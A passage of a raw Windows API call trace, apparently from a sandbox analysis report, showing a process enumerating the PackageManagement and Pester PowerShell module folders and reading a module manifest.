ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0280.781] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0280.781] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0280.782] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0280.782] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0280.782] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0280.782] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0280.783] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0280.783] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0280.783] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0280.783] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0280.784] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0280.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0280.784] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0280.784] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0280.784] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0280.784] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0280.784] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0280.784] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0280.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.785] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.785] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0280.785] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.785] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.785] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0280.786] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.786] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0280.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0280.786] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cbb0 | out: lpFileInformation=0x653ef8cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0280.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0280.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0280.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0280.786] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x8f4 [0280.787] GetFileType (hFile=0x8f4) returned 0x1 [0280.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0280.787] GetFileType (hFile=0x8f4) returned 0x1 [0280.787] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c3ff4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c3ff4a8*, lpNumberOfBytesRead=0x653ef8c948*=0x5f8, lpOverlapped=0x0) returned 1 [0280.787] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c3fe9e0, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c3fe9e0*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0280.787] ReadFile (in: hFile=0x8f4, lpBuffer=0x25b5c3ff4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c3ff4a8*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0280.787] CloseHandle (hObject=0x8f4) returned 1 [0280.789] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0280.789] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0280.789] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0280.789] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0280.789] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0280.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.789] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0280.790] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.790] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.790] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0280.790] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.790] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0280.791] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.791] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.791] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0280.792] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0280.792] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0280.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0280.792] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.793] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.793] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0280.793] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0280.793] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0280.793] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0280.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, 